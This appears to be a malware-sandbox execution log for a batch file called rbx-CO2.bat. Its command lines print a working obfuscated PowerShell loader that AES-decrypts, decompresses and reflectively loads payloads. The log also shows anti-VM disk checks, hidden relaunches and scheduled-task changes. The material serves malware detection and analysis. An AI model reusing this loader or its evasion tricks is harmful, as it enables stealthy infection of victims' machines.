Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111
)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
